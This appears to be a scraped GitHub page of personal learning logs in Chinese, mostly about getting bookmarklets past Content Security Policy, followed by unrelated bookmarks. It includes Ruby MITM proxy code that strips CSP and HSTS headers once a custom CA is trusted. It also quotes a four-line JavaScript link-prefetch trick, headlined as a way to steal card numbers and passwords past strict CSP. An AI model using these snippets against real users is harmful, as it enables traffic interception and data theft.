twtw / learninglogs Goto Github PK
View Code? Open in Web Editor NEWtry to log my navigation history
try to log my navigation history
sightmachine/SimpleCV: The Open Source Framework for Machine Vision
Linux / UNIX Desktop Fun: Terminal ASCII Aquarium - nixCraft
How to look up dictionary via command line on Linux - Xmodulo
Home - Freeplane - free mind mapping and knowledge management software
technomancy/leiningen: Automate Clojure projects without setting your hair on fire.
# Welcome to aMule, the all-platform eMule-like P2P client #
Nitrogen - ArchWiki -- 設桌布
寫了些自己常用的 bookmarklets,但總不能在 github 的網頁運行,是因為裡面有 CSP: Content Security Policy 政策,讓 chrome, firefox 看到這些 headers: content-security-policy, strict-transport-securitystrict-transport-security,而造成 bookmarklet 無法執行。
Doesn't work because of Content Security Policy - Greasy Forum -- 這招在 firefox 有解決
CSP Tester -- 來測試
Content Security Policy -- github 一直解決不了的原因所在!
javascript - Does Content Security Policy block bookmarklets? - Stack Overflow -- 不是很有效,可參考
HomeMarks - Bookmarklet Fixed For Sites With Strict CSP Policies -- 號稱可解決?
homemarks: HomeMarks is a web based GUI to build HTML start pages -- 其github裡原始碼值得看
試過調整 squid cache 來移除 response header,無效。
以上是透過既有的軟體設定無效的過程。
將用 torsten/proxy.rb 來改寫可移掉 Content-Security-Policy 的 header 的簡單 proxy。但只能處理 port 80, SSL 無法處理。
參考:
ruby SSL proxy (MITM) - Stack Overflow
ssl - How do I write a simple HTTPS proxy server in Ruby? - Stack Overflow
利用 rack-proxy 試試能不能如願,但不確認是否能做成給一般 browser 用的 proxy,而沒再試。
fedux.org – Setting up an HTTP proxy with ruby
Creating a Forward Proxy with WEBrick | Independent Software
根據這兩篇,再看 webrick/lib/webrick/httpproxy.rb 來寫了這個:
# encoding: utf-8
# https://www.fedux.org/articles/2015/04/11/setup-a-proxy-with-ruby.html
# http://www.independent-software.com/creating-a-forward-proxy-with-webrick/
#
require 'webrick'
require 'webrick/httpproxy'
require 'logger'
#logger = Logger.new($stderr)
#logger.level = Logger::DEBUG
def handle_resquest(req, res)
#puts "[REQUEST] " + req.request_line
#res.header.delete('Content-Security-Policy')
end
handler = proc do |req, res|
puts res['content-type']
puts res.body.class
if res['content-type'] == 'text/html'
res.body = res.body.upcase
end
#res.body << "\nCHANGED\n"
end
#proxy = WEBrick::HTTPProxyServer.new Port: 3128
#proxy = WEBrick::HTTPProxyServer.new Port: 3128, Logger: logger
proxy = WEBrick::HTTPProxyServer.new(
:Port => 3128,
#:Logger => logger,
:ProxyContentHandler => handler)
trap 'INT' do proxy.shutdown end
trap 'TERM' do proxy.shutdown end
proxy.start
結果是 http 可以,https 不行,原來若 https , header, body 都是空的。
試著把 $HOME/.rvm/rubies/ruby-2.5.0/lib/ruby/2.5.0/webrick/httpproxy.rb 直接接抓改 header,結果也是 http 可以,但 https 的 headers, body 都是空的。
bbtfr/evil-proxy: A ruby http/https proxy to do EVIL things. 是對 https 的正解
改body:
# encoding: utf-8
# change http body
require 'evil-proxy'
proxy = EvilProxy::MITMProxyServer.new Port: 3128
proxy.before_response do |req, res|
#puts res.inspect
body = res.body << "\nCHANGED\n"
res.header['content-length'] = body.length
res.body = body
end
proxy.start
改 header:
# encoding: utf-8
# remove https header
# import CA certificate (./certs/CA/cacert.pem) into browser
# https://github.com/bbtfr/evil-proxy/blob/master/lib/evil-proxy/quickcert.rb
#
require 'evil-proxy'
proxy = EvilProxy::MITMProxyServer.new Port: 3128
proxy.before_response do |req, res|
res.header.delete('content-security-policy')
res.header.delete('strict-transport-security')
#puts res.header.inspect
end
proxy.start
但 browser 要先匯入 CA certificate (./certs/CA/cacert.pem)
我是這樣拿走大家網站上的信用卡號跟密碼的
下面這四行程式就算是最嚴格的 CSP 也能夠輕鬆繞過
const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
APIs - Develop - NCBI -- 開發API總頁面
E-utilities Quick Start - Entrez Programming Utilities Help - NCBI Bookshelf -- 快速了解
Sample Applications of the E-utilities - Entrez Programming Utilities Help - NCBI Bookshelf -- 例子
The E-utilities In-Depth: Parameters, Syntax and More - Entrez Programming Utilities Help - NCBI Bookshelf -- query pmid 之語法
A General Introduction to the E-utilities - Entrez Programming Utilities Help - NCBI Bookshelf -- 基本介紹
Entrez Programming Utilities Help - NCBI Bookshelf -- 整個說明的目錄
sed -e "s/\(.*\)\[\(.*\)\]/- [\2](\1)/g"
Morten Rand-Hendriksen: CSS Grid Changes Everything (About Web Layouts) - YouTube --精彩理念
WCEU2017: CSS Grid Changes Everything (About Web Layouts) - MOR10 --上面的ppt
WCEU2017: CSS Grid Changes Everything (About Web Layouts) - MOR10
CSS Grid Inspector: Examine grid layouts - Firefox Developer Tools | MDN
google: Rachel Andrew and Morten Rand-Hendriksen YT
Resque.before_first_fork do //initialize mongo_mapper here end
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.